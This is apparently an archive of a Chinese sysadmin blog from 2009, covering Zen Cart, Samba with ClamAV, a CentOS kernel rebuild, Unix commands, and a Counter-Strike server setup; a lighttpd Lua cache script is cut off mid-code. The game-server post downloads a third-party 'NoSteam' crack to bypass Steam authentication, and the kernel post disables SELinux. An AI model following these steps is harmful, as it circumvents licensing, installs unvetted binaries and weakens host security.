例子：你修改了/includes/languages/custom/schinese.php文件, 升级后, /includes /languages/schinese.php文件中有些新的定义。显然你要把这些新的定义加入到你的schinese.php文件中。
最容易的方法就是使用文件比较工具！
推荐使用WinMerge, 也是开源免费。
有了文件比较工具，你就可以比较你的/includes/languages/custom/schinese.php文件，和新的核心文件/includes/languages/schinese.php，然后很容易将新的修改加入到你的替代文件中。
zen-cart如何添加新的页面？

最近一直在弄网店，发现很多关于修改zen-cart的文章，于是整理了一些。
首先，创建自己的模板文件。附加页面在includes/languages/schinese/ 目录下，文件名为：page_2.php, page_3.php 和 page_4.php。在includes/languages/schinese/下建立一个新目录，命名为 YOUR_TEMPLATE，然后将三个PHP文件拷贝到includes/languages/schinese /YOUR_TEMPLATE 目录下，您就可以随意修改了。需要更多页面，只要再复制文件，然后命名为page_5，page_6 等等。
您还需要给附加页面添加头文件。打开includes/ modules/ pages，复制您需要的所有 page_X 目录和目录内文件，按您的页面改名。
现在打开includes/ filenames.php文件，按照相同的命名规则修改文件。
最后，在includes/ templates/ YOUR_TEMPLATE/ templates/目录下，为附加页面创建模板页。复制tpl_page_X_default.php文件，然后再按照相同的命名规则改名。
要在”更多信息”方框内修改/添加新页面，将 /includes/ languages/ schinese.php文件，复制到模板目录下，找到定义more_information方框的段落，按您的需要修改”更多信息”，同时修改链接的名称。
剩下的就是添加链接到方框。复制 /includes/ modules /sideboxes/ more_information.php文件到模板目录，按照相同的模式添加您的链接，然后进入管理页面，工具->外观控制，设置该文件。

什么是Zen Cart？

admin — Fri, 24 Apr 2009 02:06:04 +0000

为网上销售商而设计

Zen Cart是真正的电子商务艺术，一个免费、界面友好，开放式源码的购物车软件。该软件由一些销售商、程序员、设计师和顾问们共同开发，目的就是用户能建立风格不同的电子商务系统。现有的一些解决方案过重于编程，而不是着眼于客户的需求。ZenCart把销售商和购物者的需求放在第一位。同时，那些程序如果没有专业人员，几乎不可能安装成功，而一个有基本计算机知识的人就会安装Zen Cart。另外那些程序也非常昂贵… 而Zen Cart，完全免费!

为网上购物者而设计

Zen Cart将带给您的客户全新的网上购物体验。通过Zen Cart浏览商品将会变得轻而易举。除了传统的目录清单，该程序还提供几个特色商品目录。商品加入购物车后，只要简单的三步就可以安全结帐。客户填写交货地址，选择交货方式（含多种交货方式，内置网上实时运费报价）。然后，从多种流行的付款方式中任选一种。（例如，PayPal和AuthorizeNet）最后，客户复查订单、交付方式和付款选择，然后确认订单。您可以立即得到订单通知，客户也会收到电子邮件的订单确认。

Zen Cart实现了我们设定的很多目标：
* 容易安装
* 容易定制
* 自动化，例如订单确认
* 方便浏览
* 内置的促销、折扣、礼物券、新闻简讯和商品通知功能
* 单件商品优惠或者全部商品折扣，团体优惠和大订单优惠
* 内置搜索优化工具
* 密码保护的管理员工具
* 支持多种语言、货币和税率结构

简而言之，Zen Cart包括了购物车软件所应该具备的所有功能。

为网页设计者而设计

Zen Cart给网页设计者一个稳定而灵活的电子商店前台，易于更新。它提供了易用的、直观的、简洁的购物流程，完全依照现行商业标准 – 您的客户即刻能使用它！该软件强大功能的一个秘密就是模板系统。该模板系统抽象了Zen Cart代码和逻辑的”观感”，从而带给您的客户一个真正可定制的方案，迅速而完美地集成他们现行的营销网站。

为程序员和服务器提供商而设计

基于Zen Cart现代标准和技术，程序员能实现最尖端技术。采用PHP服务器端技术，以及可以适应后台多数据库系统（在以后版本中利用ADOdb技术），就能够开发出容易定制和修改的软件。
服务器最低/建议配置：PHP 4.3.2 或更高版本 (PHP 4.4.10+ 性能更佳), Apache 1.3.x 和 MySQL 3.2x.x 或更高版本。

为网上销售商而设计

Zen Cart是真正的电子商务艺术，一个免费、界面友好，开放式源码的购物车软件。该软件由一些销售商、程序员、设计师和顾问们共同开发，目的就是用户能建立风格不同的电子商务系统。现有的一些解决方案过重于编程，而不是着眼于客户的需求。ZenCart把销售商和购物者的需求放在第一位。同时，那些程序如果没有专业人员，几乎不可能安装成功，而一个有基本计算机知识的人就会安装Zen Cart。另外那些程序也非常昂贵… 而Zen Cart，完全免费!

为网上购物者而设计

简而言之，Zen Cart包括了购物车软件所应该具备的所有功能。

为网页设计者而设计

Zen Cart给网页设计者一个稳定而灵活的电子商店前台，易于更新。它提供了易用的、直观的、简洁的购物流程，完全依照现行商业标准 – 您的客户即刻能使用它！该软件强大功能的一个秘密就是模板系统。该模板系统抽象了Zen Cart代码和逻辑的”观感”，从而带给您的客户一个真正可定制的方案，迅速而完美地集成他们现行的营销网站。

为程序员和服务器提供商而设计

Freebsd 安装带杀毒功能的samba文件服务器

admin — Tue, 21 Apr 2009 04:56:39 +0000

安装Freebsd过程略

1.安装Samba 3

# cd /usr/ports/net/samba3
# make install clean
安装完samba,请设置/usr/local/etc/smb.conf.并在/etc/rc.conf加入一句使Samba随系统一起启动.

samba_enable=”YES”
2.安装clamav

# cd /usr/ports/security/clamav
# make install clean
手动更新病毒库到默认路径

# freshclam
在/etc/rc.conf加一句让Clamav随系统一起启动.

clamav_clamd_enable=”YES”
clamav_freshclam_enable=”YES” # 定时更新病毒库
3.安装samba-vscan

# cd /usr/ports/security/samba-vscan
# make install clean
在/usr/local/etc/smb.conf的[global]加入

vfs object = vscan-clamav
vscan-clamav: config-file = /usr/local/etc/samba-vscan/vscan-clamav.conf
附简单的smb.conf

# Samba config file created using SWAT
# from 127.0.0.1 (127.0.0.1)
# Date: 2005/08/06 10:55:55

# Global parameters
[global]
dos charset = GB2312
unix charset = GB2312
display charset = GB2312
workgroup = SAMBA
server string = Samba PDC running %v
log level = 2
log file = /var/log/samba/log.%m
max log size = 50
socket options = TCP_NODELAY IPTOS_LOWDELAY SO_SNDBUF=8192 SO_RCVBUF=8192
local master = No
dns proxy = No
ldap ssl = no
#hosts allow = 10.0., 127.
vfs object = vscan-clamav
vscan-clamav: config-file = /usr/local/etc/samba-vscan/vscan-clamav.conf

[homes]
comment = Home Directories
valid users = %S
write list = %S
read only = No
create mask = 0666
directory mask = 0777
browseable = No

[profiles]
path = /home/samba/profiles
read only = No
create mask = 0600
directory mask = 0700
browseable = No

[netlogon]
comment = Network Logon Service
path = /home/netlogon
write list =
browseable = No

结过昨晚的努力，终于解决博客分类下拉菜单的问题

admin — Tue, 21 Apr 2009 03:58:13 +0000

经过昨晚的努力，终于解决博客分类下拉菜单的问题，原先以为是俺博客迁移后所造成的缘故，原以为是博客空间从apache迁移到Lighttpd后出现的环境问题，甚至是迁移后的数据库问题。但是经过昨天的检查与验证，发觉不是。原来是之前博客所用inove模板自身的问题。起初，俺也不这样认为，但是，自俺昨晚连续测试两上新的模板后，原来的分类菜单都能正常显示出来。那这就说明这个inove模板屏蔽了下拉菜单。而俺昨晚也找到inove的支持网站，找到inove开发者的在线联系方式，尝试加inove开发者的QQ，在线探讨一下这个问题，只是inove的开发者，过于高傲，不屑于跟俺探讨这个问题。因而，当俺尝试加inove开发者的QQ时，对方并没有通过。。。因而，俺有点气愤inove开发者的心高气傲，就想着独自解决这个问题，也想着放弃这个inove模板。。。转而在wordpress的theme目录下面，下载了下载排名最高的四个模板。其中一个就是俺现在用这个模板。一用上，在后台适当调整一下。分类的目录就顺利显示出来。。。
现在这个模板。功能很强大，无论是功能，还是可控性都要比inove强。基本上是提供可视化的css编辑与修改。定制性很强。虽然，俺现在只是用到其中一部份功能。但细究下去，应该可以发现到许多惊喜。。。如果熟练之，真的可以将wordpress定制成一个cms网站界面。。。。

解决IE8安装ALEXA工具条出现不兼容的问题

admin — Thu, 16 Apr 2009 06:06:33 +0000

相信有不少朋友已经碰到过这种现象，就是升级到IE8后，原来的ALEXA工具条已经不出来。并弹出以下窗口。内容如：res://AlxTB1.dll/CHTML/bootstrap.html

解决办法很简单
点击：开始–>运行–>输入res://AlxTB1.dll/CHTML/bootstrap.html
然后弹出IE，点击允许，点几次，直到不提示为止。
重启IE，OK。

centos4.4 升级内核打netfilter补丁

admin — Sun, 12 Apr 2009 00:35:12 +0000

1、下载
linux-2.6.15.6.tar.bz2
patch-2.6.15.6.bz2
iptables-1.3.6.tar.bz2
patch-o-matic-ng-20061024.tar.bz2
2、解压缩
cd /usr/src
tar -jxf linux-2.6.15.6.tar.bz2
tar -jxf iptables-1.3.6.tar.bz2
tar -jxf patch-o-matic-ng-20061024.tar.bz2

3、内核先打补丁
cd /usr/src/linux-2.6.15.6
bunzip2 -dv /usr/src/patch-2.6.15.6.bz2 | patch -p0
vi /usr/src/linux-2.6.15.6/include/linux/posix_types.h
#define __FD_SETSIZE 65536
vi /usr/src/linux-2.6.15.6/include/linux/fs.h
#define INR_OPEN 65536
#define NR_FILE 65536
vi /usr/src/linux-2.6.15.6/include/net/tcp.h
#define TCP_TIMEWAIT_LEN (1*HZ)
#define TCP_SYNACK_RETRIES 3

4、拷贝原来的config
cp /boot/config-2.6.9-42.ELsmp ./.config
注：我的是双cpu的机器，所以是ELsmp
make menuconfig

选择 Load an Alternate Configuration File
选择 .config
保存退出

5、打netfilter补丁
cd /usr/src/path-o-matic-ng-20061024
./runme –download
注：上述命令选择下载ipp2p time等补丁
export KERNEL_DIR=/usr/src/linux-2.6.15.6
export IPTABLES_DIR=/usr/src/iptables-1.3.6
./runme ipp2p
./runme time
./runme connlimit

6、配置内核选项
networking
networking options
network packet filtering (replaces ipchains)
IP:Netfilter Configuration
把 ipp2p、time、 Connections/IP 选上

Security options
NSA SELinux Support 选项去除

同时保存退出

vi /etc/sysconfig/selinux
SELINUX=disabled

7、开始编译并安装
make all
make modules
make modules_install
make install

8、设置grub.conf
设置default=0的相关项

重新启动计算机

9、安装新版本iptable
cd /usr/src/iptables-1.3.6
export KERNEL_DIR=/usr/src/linux-2.6.15.6
export IPTABLES_DIR=/usr/src/iptables-1.3.6
make BINDIR=/sbin LIBDIR=/lib MANDIR=/usr/share/man install

10、测试
uname -r 显示内核版本
iptables -V 显示iptables版本
ulimit -a 显示最大打开文件等参数
top 选择1 看多cpu支持情况

unix常用指令及参数

admin — Wed, 08 Apr 2009 13:48:23 +0000

常用组合键
ctrl+h,backspace :删除前面的字符.
ctrl+u:删除一整行.
ctrl+c,del,break: 强行终止正在运行的程序.
ctrl+d:
常用指令
1.date:查看当前时间.
2.cal:查看某一个月的月历.
3.Finger 命令:显示一个用户的详细信息.
4.who命令:显示所有登陆用户.who an i
5.clear 命令:执行清屏动作.
6.echo 命令:将命令名后跟随的参数显示在屏幕echo hello

world
7.banner 命令:将命令名后跟的ACSSII字符串以大字的方式显

示在屏幕上banner hello
8.wc 命令:用于计算一个指定的文件中的行数单词及字符数:
格式wc[-c(计算字符的数目)] [-l(计算行的数目)] [-w(计算

单词的数目)] filename
9.passwd 命令,用于修改口令.
10.man 命令:联机手册
六.shell的基本功能:命令解释器,程序设计语言.
shell的退出命令.
1.exit 主要用于退出B_shell
2.logout 主要用于退出C_shell
3.ctrl+d 用于退出各类shell
第三章通信
内部通信
外部通信<1,电子邮件,2.即时通信
一.即时通讯
1.write 交谈命令 (半双工通信)
格式 write student1
ctrl+d 退出write
Write协议:消息发送结束用O(结束)
结束谈话用OO(结束并退出)
2.mesg 消息开关命令.用于查询和开关本终端的消息接收状态.
格式:mesg [-y] [-n]
$ mesg 查询本终端当前的消息接收状态
is y 可以接收消息
is n 拒绝接收消息
$ mesg n 设置关闭状态
$ mesg y 设置打开状态
3.talk 双向通信命令 (全双工方式)
4.wall 广播信息命令
二,电子邮件
$ mail username 发送邮件
$ mail 接收邮件
系统邮箱:在/usr/mail或/var/mail下,每个用户都有一个以其名字

命名的邮箱.例如:student8的系统邮箱可能为:/var/mail/student8
个人邮箱:个人邮箱通常为用户自己的主目录(home)下的mbox

文件.用户读过的邮件如果末删除或转存,则存放在个人邮箱中

.例如:student8的个人邮箱可能是:/home/student8/mbox
1.发送邮件:
$ mail student8
给多个用户发送邮件
a.$ mail student1 student2 student3 把用户列出来.
b.$ mail TEACHER TEACHER为用户组名,即向属于TEACHER

组所有用记发邮件.
c.$ alias usr_list student1 student2 student3给student1 student2

student3等多个名字建立一个部的别名usr_list,该别名只在本

shell中起作用,退出shell后无效.
$ mail usr_list
把已有的文件作为邮件发送给用户:
$ mail student8 < my_letter
发邮件给不存在的用户:
$ mail meizhegeren
mail命令本身能正常执行,由于无有效的接收方,所以系统把邮

件退回到用户主目录下dead.letter中.
2.接收邮件
不带参数输入mial表示读取邮件.此时已进入出境mail命令模式

下.
mail命令模式常用命令
如有下页则显示,否则退出mail.
p 显示本邮件信息
d 删除当前邮件
n 显示下一个邮件
q 退出 mail,把末删除的邮件保存到个人邮箱中.
R 回复邮件
! 执行shell命令.
? 显示mail的内部命令.
第四章文件系统
与目录相关的命令(pwd,cd,mkdir,rmdir,ls)
与文件相关的命令(cp,mv,ln,more,rm)
1.pwd 显示当前工作目录
2.cd 改变当前目录
3.mkdir 创建目录
格式 mkdir dir_name
4.rmdir 删除目录
格式 rmdir dir_name
a.只能是空目录.
b.有写的权限
一次操作多个目录
- p 选项.在当前目录下逐级创建目录,也可以逐级删除目录.
5.ls 显示目录
$ ls -a 显示所有文件(以点开头的文件名是隐藏文件)
$ ls -R 显示所有子目录的内容
$ ls – l 能得到目录中的文件的详细信息.
-:普通 d: 目录 c: 字符设备 b: 块设备 p:管道
$ ls – C 以多列的格式列表,按列排序.
$ ls – F 如果是目录,文件名后加/,如果是可执行文件,加*表示.
$ ls – m 按页宽列文件,以逗号分隔.
$ ls – p 如果是目录,文件名后加/
$ ls – r 以字母反序列表
$ ls – s 以文件块为单位显示文件大小
$ ls – x 以多列的格式列表,按行排序.
$ ls -G 以不同的颜色显示.
$ ls -lc 显示更新时间
$ ls -i inode序号将列在第一列
$ ls -lu 显示访问时间
$ ls -I 显示更改时间
6.touch 命令:作用是用来修改文件访问时间更改时间的.并可以

用来创建0字节长度的文件.
格式 touch 命令参数
7.cp 命令:复制文件
格式 cp source target
$ cp file1 file2 … Target-dir
$ cp -i 如果目标文件存在,请求确认
$ cp -r 复制目录到新的目录
8.mv 命令:移动文件或命名文件
格式:mv source target
9.ln 命令:ln命令的主要功能是给一个已经存在的文件再取一个

名字.新的文件名与原文件名可以在同一个目录下,也可以以在

不同的目录下,新老文件名代表同一个文件.
格式ln source-file target-file
作用:在现有的文件与新文件之间建立新链接,使一个文件具有

一个以上的名字.
显示文件内容命令
10.cat 命令:用来显示.创建或者合并文件
格式cat filename
11.more 命令:逐屏显示文件内容.翻屏时用键.
格式:$ more filename
12.rm 命令:删除文件(删除后无法恢复)
格式:$ rm file
$ rm file1 file2
$ rm -i 删除文件前,给出确认
$ rm -r 删除指定的目录及目录中的所有文件和子目录.即删除

整个目录结构.
13.lp 命令:打印命令
14.cut 命令:切取文件内容,用于切取文件中的列或字段.它把文

本文件中每一行的一部分显示输出.运行时必须指定功能选项.
- f 指定字段的位置
-c 指定列的位置
-d 指定字段分隔符,缺省的字段分隔符是制表符tab
15.paste 命令:连接文件.
作用:把文件一行接一行地连接在一起,或者把两个或多个文件

的域连到一个新文件里.
格式: $paste 选项参数
选项:-d 指定分隔符.默认是制表符
第五章文件权限
16.chmod 命令:修改文件权限,常用chmod命令修改文件(包括普

通,目录和设备)的访问权限,
格式: chmod pattern filename …
finename 为要修改的权限文件名.可以有多个.
pattern 为将改变成的权限,可以用两种形式表示:字母式和数字

形式.
a,字母形式(符号模式)
字母形式由用户类别(u,g,o). 如何改变(+,-)和权限(r,w,x)三部分

组成.
u:本用户g:同组用户o:其它用户. + :增加权限 -:删除权限
r:读w:写x:执行
例如:chmod u+x file1
chmod o-w file2 file3
chmod go+r file4
b, 数值形式
格式: chmod 777 file1
*新建文件或目录最大权限=状态掩码+新建文件或目录缺省

权限.此时unask为000
对一个新建的文件,umask值为022则指定该文件的权限为644:
对一个新建的目录,umask值为022则指定该目录的权限为755
17.sort 命令:作用在于将指定的文件中的文件进行排序,并把排

序的结果输出到指定的标准输出中.
格式:$srot [-t delimiter] [+field] [.column]][option]
选项: -d 以字典顺序进行排序
-
18.head 命令:用于查看一个文件.或多个文件的前面几行的内

容.
格式:$ head [-number_of_lines] file(s)
19.tail 命令:用于显示从指定行开始直到文件末尾的文件内容
格式;tail [-number_of_lines | +number_of_lines]file
20.tee 命令:在获得输入后,将把该输入数据送到两个地点:标准

输出和文件.
21.grep 命令: 用于选项定包含特定模式的文本行.
21.find 命令:在目录中递归地搜索包括有特定字符的文件名.
22.df 命令:磁盘空间监测命令.显示当前系统中各个逻辑磁盘

中空闲的磁盘块数和空闲的索引节点(即可建立的新文件数)
23.du 命令:查看磁盘使用情况统计,统计指定的目录及所有子

目录的磁盘使用情况,统计单位是磁盘块数.
选项:-a 显示所有文件及子目录
24.fsck 命令:文件系统管理:用于检测和修复文件文件的错误,
25.tar命令:文件存储与备份.该命令可以把文件系统中的一个

或一组文件打成一个文件包.存放到外存上或硬盘上文件系统

的其它地方.常用于多个文件(包括目录)的备份或转移.
格式: tar -cvf target file1 file2 file3 …把file1 file2 file3等文件备份到

档案文件target中.
tar -tvf target 检查档案文件target中包含的文件信息.
tar -xvf targer [file1] 从档案文件target中提取全部或file指定

的文件.
26.shutdown 命令:系统关机
选项:-h 完全关机
-r 关机并重新启动系统
time 关机时间,如17:30
message 关机前向所有已登陆用户发送消息
例如: shutdown -r now 现在关机重启.
27.crypt 文件加密命令:用于对文本文件进行加密和解密.以防

止文件内容泄密.
例如:$ crypt < file > file.cry 对file加密,结果保存在file.cry中.key:加

密口令
$ crypt aaa 对aaa.cry解密,结果保存到aaa中. key:

解密口令
附:$ vi -x file.cry 编辑一个加密后的文件
28.compress/uncompress 文件压缩和解压命令
格式:compress data_file 加压后自动在文件名后加一个.Z
umcompress abc.Z
29.at 定时执行任务:在指定的时间一次性执行规定的任务.
at 15:30 在15:30分执行
who >> userlist 把上机用户清单发到userlist
30,cron 系统定量执行任务:
31,crontab 任务描述文件的管理命令.

解决DZ论坛附件无法保存到服务器的部题。

admin — Tue, 07 Apr 2009 08:24:00 +0000

今天网站的DZ论坛出现这个问题论坛附件文件无法保存到服务器，可能是目录属性设置问题，请与管理员联系。
于是我帮着解决从文件夹属性到 tmp临时文件夹属性都改也没用！
接着找原因最后出现再dz后台系统设置问题上
基本设置—-附件设置—–附件路径 URL 地址: 改成绝对路径！附件保存方式:
改成其他的！
发个帖子然后改成默认的保存方式！就ok！
因为这个空间是从其他服务器换过来的可能是存在目录权限没有转换过来的原因！
解决完毕！

OpenBSD4.4下架设CS1.6服务器

admin — Mon, 06 Apr 2009 11:08:42 +0000

Setp 1：环境
1、操作系统OpenBSD4.4。
2、开启Linux支持
#mg /etc/sysctl.conf
去掉#kern.emul.linux=1前的#
#cd /usr/ports/emulators/redhat
#make install

Setp 2：下载所需软件
1：先到http://www.okgogogo.com/download/view.asp?id=393下载hlds_l_02162004.tar.gz
2：接下来下载NoSteamAuthEngines，这个是nosteam补丁：
wget http://www.cstrike.ro/cstrike_files/engine.v15.tgz

Setp 3：安装
#cd /var
#tar zxvf hlds_l_02162004.tar.gz

Setp 4：破解
#tar zxvf engine.tgz
#mv engine_amd.so hlds_l/
#mv engine_i486.so hlds_l/
#mv engine_i686.so hlds_l/

Setp 5：配置
#cd hlds_l
#mg cs
#!/bin/sh
./hlds_run -game cstrike -port 27015 -insecure -ip x.x.x.x +servercfgfile server2.cfg +maxplayers 32 +map de_dust2 -nojoy -noipx -nomaster +localinfo

Setp 6：server.cfg的设置(根据个人情况增添)
rcon_password “rconpassword”
// OP 密码
// “” 表示没有

hostname “CS1.6比赛专用服务器 #A01″
// 服务器名称

sv_region 4
// 服务器所在区域注册参数\r
// 255=全球
// 0=美国东部
// 1=美国西部
// 2=南美洲\r
// 3=欧洲
// 4=亚洲
// 5=澳洲
// 6=中东
// 7=非洲

sv_rcon_maxfailures 9999
// 输入OP密码错误次数上限
// 达到上限则封禁对方的IP

sv_rcon_banpenalty 5
// 封禁的时限单位分钟
// 0=永久

sv_maxupdaterate 30
// 服务器每秒更新最大频率\r
// 根据实际网络状况调节
// 默认=30
// 局域=101

sv_minupdaterate 20
// 服务器每秒更新最小频率\r

sv_unlag 1
// 玩家延时补偿
// 0=关闭
// 1=开启 (默认)

sv_maxunlag 0.5
// 延时补偿最大值默认 0.5
// 0.5=500毫秒 (默认)

sv_voiceenable 1
// 服务器是否允许麦克风语音通讯
// 0=禁止
// 1=允许 (默认)

sv_unlagsamples 1
// 延时补偿数据包平均采样数量\r
// 默认=1

sv_unlagpush 0
// 服务器推进延时补偿\r
// 0=关闭 (默认)
// 1=开启\r

mp_autokick 0
// 自动踢除不动的玩家\r
// 0=关闭
// 1=开启 (比赛默认)

mp_autocrosshair 0
// 自动瞄准
// 0=关闭 (默认)
// 1=开启\r

mp_autoteambalance 0
// 自动平衡双方人数
// 0=关闭 (比赛默认)
// 1=开启\r

mp_buytime 0.25
// 每回合购买武器装备时间单位分钟\r
// 比赛默认=0.25

mp_consistency 1
// 防止某些模型被更改\r
// 0=关闭
// 1=开启 (默认)

mp_c4timer 35
// C4爆炸倒计时单位秒
// 比赛默认=35

mp_decals 300
// 墙壁上的血花弹孔贴图细节数据传送(200-300)

mp_falldamage 1
// 高处落下伤害
// 0=关闭
// 1=开启 (默认)

mp_fadetoblack 0
// 死后黑屏
// 0=关闭 (默认)
// 1=开启\r

mp_flashlight 1
// 手电筒\r
// 0=禁止
// 1=允许 (默认)

mp_forcechasecam 2
// 死后跟随
// 0=所有玩家\r
// 1=仅队友\r
// 2=仅队友，主视角 (比赛默认)

mp_forcecamera 2
// 死后视角选择
// 0=全部视角
// 1=仅队友，全部视角
// 2=仅队友，主视角 (比赛默认)

mp_footsteps 1
// 脚步声\r
// 0=关闭
// 1=开启 (默认)

mp_fraglimit 0
//杀人数上限(1~n)，超过上限就换地图\r
// 0=关闭 (默认)

mp_freezetime 7
// 每回合开始冻结时间单位秒

mp_friendlyfire 1
// 友军伤害
// 0=关闭
// 1=开启 (默认)

mp_friendly_grenade_damage 1
// 友军手雷伤害
// 0=关闭
// 1=开启\r

mp_hostagepenalty 0
// 惩罚人质杀手\r
// 0=不惩罚 (默认)
// 1~N=人质被杀数量，超过则踢出该玩家\r

mp_limitteams 10
// 两队人数差异上限
// 超过此上限，新玩家只能当观察员\r
// 比赛默认=10

sv_logbans 1
// 服务器日志里记录Ban掉玩家的内容
// 0=不记录\r
// 1=记录

mp_logecho 1
// 将服务器日志反馈到控制台
// 0=关闭
// 1=开启\r

mp_logdetail 3
// 服务器日志里记录攻击信息
// 0=不记录任何信息\r
// 1=记录敌人攻击
// 2=记录队友攻击
// 3=记录所有攻击\r

mp_logfile 1
// 服务器记录日志为文件
// 0=不记录\r
// 1=记录

mp_logmessages 1
// 服务器日志里记录谈话内容
// 0=不记录\r
// 1=记录

mp_maxrounds 0
// 回合上限，达到此上限，自动重新载入新地图
// 0=无回合上限 (默认)

mp_playerid 0
// 当准星指向敌人或队友时，显示他们的名字\r
// 0=关闭 (比赛默认)
// 1=开启\r

mp_roundtime 1.75
// 每回合时限单位分钟\r

mp_timelimit 0
// 地图最大时限，达此时限，自动重新载入新地图
// 0=无时限\r

mp_tkpunish 0
// 惩罚队友杀手\r
// 0=关闭 (默认)
// 1=开启\r

mp_startmoney 800
// 第一回合开始金钱(800~16000)
// 加时赛=10000

mp_winlimit 0
// 一方最大胜利回合数，达到此数量，自动重新载入新地图
// 0=无限制 (默认)

sv_aim 0
// 自动瞄准
// 0=关闭 (默认)
// 1=开启\r

sv_airaccelerate 10
// 玩家在空中移动的速度
// 默认=10

sv_airmove 1
// 在空中移动&转向
// 0=禁止
// 1=允许(默认)

sv_allowdownload 1
// 客户端下载服务器资源
// 0=禁止
// 1=允许 (默认)

sv_allowupload 1
// 客户端上传自己的喷图
// 0=禁止
// 1=允许 (默认)

sv_alltalk 0
// 警匪通话
// 0=禁止 (默认)
// 1=允许

sv_proxies 1
// HLTV代理
// 0=禁止
// 1=允许 (默认)

sv_cheats 0
// 作弊模式
// 0=关闭 (默认)
// 1=开启\r

sv_clienttrace 1.0
// 客户端模型的范围框的尺寸
// 默认 1.0

sv_clipmode 0
// 锁定客户端快速模式\r
// 0=关闭(默认)
// 1=开启\r

sv_contact boezombie@gmail.com
// 服务器构建者的联系邮箱

sv_friction 4
// 地面摩擦力默认 4
// 数值越低，摩擦越小

sv_gravity 800
// 重力默认 800

sv_maxrate 25000
// 服务器最大传输速率 <0-25000>
// (服务器上传带宽 x 125) /服务器设定的最大人数 = 要设的值\r
// 0=无限制\r
// 局域=25000

sv_maxspeed 320
// 客户端最大移动速度

sv_minrate 0
// 服务器最小传输速率 <0-25000>
// sv_maxrate / 300 = 要设的值\r
// 0=无限制\r

sv_restartround 0
// 重新开始第一回合在n秒后

sv_restart 0
// 重新开始游戏在n秒后
// 作用等同于sv_restartround

sv_send_logos 1
// 客户端相互之间传送喷图\r
// 0=禁止
// 1=允许(同时确保sv_allowdownloads键值为1)

sv_sendvelocity 0
// 服务器混合物理运算，适用于较好配置的服务器\r
// 0=关闭
// 1=开启\r

sv_send_resources 1
// 自动向客户端传送地图关联的 & .res文件里包括的资源文件
// 0=关闭
// 1=开启(同时确保sv_allowdownload为1)

sv_stepsize 18
// 玩家的步伐距离\r
// 默认 18

sv_stopspeed 75
// 玩家停止移动时的速度默认 75

sv_timeout 65
// 客户端连接服务器超时的时限，达到时限则断开连接

sv_voicecodec voice_speex
// 语音通话解码
// voice_miles是HL引擎长期以来用的语音解码(默认)，占用带宽较大，为32kbps
// voice_speex是Valve新加入的解码，优于voice_miles，占用带宽较少，为2.4kbps至15.2kbps

sv_voicequality 5
// 客户端语音通话质量(确保sv_voicecodec voice_speex)
// 1=非常差………..占用带宽 2.4 kbps
// 2=差……………占用带宽 6.0 kbps
// 3=中等………….占用带宽 8.0 kbps
// 4=好……………占用带宽 11.2 kbps
// 5=非常清晰………占用带宽 15.2 kbps

allow_spectators 1
// 观察员模式\r
// 0=禁止
// 1=允许

decalfrequency 60
// 玩家喷图的时间间隔单位秒

edgefriction 2
// 玩家与玩家、墙壁、物体之间的摩擦
// 默认 2

host_framerate 0
// 与Demo录制有关
// 0 // n=0 为正常(默认)
// n>1 为快录\r

log on
// 开始记录日至\r

pausable 1
// 客户端暂停游戏\r
// 0=禁止
// 1=允许

mapcyclefile mapcycle.txt
// 地图循环列表所在的.txt文件
// *.txt = cstrike\*.txt文件

Installing WP Super Cache with lighttpd

admin — Sun, 05 Apr 2009 14:06:49 +0000

Trying to get WP Super Cache & WordPress working on my fast lighttpd server, I came into problems, mainly because of lighttpd’s lack of (Apache’s version of) the mod_rewrite module. The static files that were created from the cache were not statically served from wordpress. The problem is that in order to use them, the PHP fcgi was called for each request. So, why would we have to call PHP every time that a file can be completely statically provided by the web server?

Following this guide I came up with some problems trying to serve the static files. The problem with that version of the rewrite.lua script is that it does not really work the way it should. The whole point of using WP Super Cache is to avoid calling the PHP fcgi for posts that are already cached into an html file. Calling the PHP fcgi is much slower than using the “core” lighttpd static-page-serving facilities.

So, what did I do to avoid calling the PHP fcgi?

The following script takes the url that was asked from the client. It checks whether there is a fresh version of a static HTML page on the cache and if yes, it servers that. If the file does not exist al all or the it is expired(I check its modification date) then the request is forwarded to the PHP fcgi so that it can be freshly served.

In my lighttpd.conf I have put this:

view sourceprint?
01.
$HTTP["host"] == “www.asteriosk.gr” {
02.

03.
alias.url = ( “/storage/” => “/opt/storage/” )
04.
server.document-root = “/opt/apps/wordpress/”
05.
url.rewrite = (
06.
“^/(wiki|wp-admin|wp-includes|wp-content|storage)/(.*)” => “$0″,
07.
“^/(sitemap\.xml|sitemap\.xml\.gz)” => “$0″,
08.
“^/(.*\.php)” => “$0″,
09.
“^/(.*)$” => “/index.php/$1″
10.
)
11.
magnet.attract-physical-path-to = ( server.document-root + “rewrite.lua” )
12.

13.
}
And in the rewrite.lua file I have put this:

view sourceprint?
01.
expiration_time = 10*60
02.

03.
function serve_html(cached_page, expiration_time)
04.
attr = lighty.stat(cached_page)
05.
–Check if the cached file has expired
06.
if (attr and (attr['st_mtime'] + expiration_time) > os.time() ) then
07.
lighty.env["physical.path"] = cached_page
08.
return true
09.
else
10.
return false
11.
end
12.
end
13.

14.
function serve_gzip(cached_page, expiration_time)
15.
attr = lighty.stat(cached_page .. “.gz”)
16.
–Check if the gziped cached file has expired
17.
if (attr and (attr['st_mtime'] + expiration_time) > os.time() ) then
18.
lighty.header["Content-Encoding"] = “gzip”
19.
lighty.header["Content-Type"] = “”
20.
lighty.env["physical.path"] = cached_page .. “.gz”
21.
return true
22.
else
23.
return false
24.
end
25.
end
26.

27.
attr = lighty.stat(lighty.env["physical.path"])
28.
if (not attr) then
29.

30.
lighty.env["physical.rel-path"] = lighty.env["uri.path"]
31.
–Change the “/opt/apps/wordpress/” to your own wordpress location
32.
lighty.env["physical.path"] = “/opt/apps/wordpress/”
33.
.. lighty.env["physical.rel-path"]
34.
– If we are querying, we don’t have to cache of course
35.
query_condition = not ( lighty.env["uri.query"] and
36.
string.find(lighty.env["uri.query"], “.*s=.*”))
37.
–If there exists a cookie in the client, probably he/she has been here before
38.
–and has left a comment. In that case we don’t use cached content
39.
–for example, the user might has just submitted a comment.
40.
user_cookie = lighty.request["Cookie"] or “no_cookie_here”
41.
cookie_condition = not (string.find(user_cookie, “.*comment_author.*”) or
42.
string.find(user_cookie, “.*wordpress.*”) or
43.
string.find(user_cookie, “.*wp-postpass_.*”))
44.

45.
if (query_condition and cookie_condition) then
46.
–construct the full path of the expeted cached filename for this url
47.
accept_encoding = lighty.request["Accept-Encoding"] or “no_acceptance”
48.
cached_page = lighty.env["physical.doc-root"] ..
49.
“/wp-content/cache/supercache/” ..
50.
lighty.request["Host"] ..
51.
lighty.env["request.uri"] ..
52.
“/index.html”
53.

54.
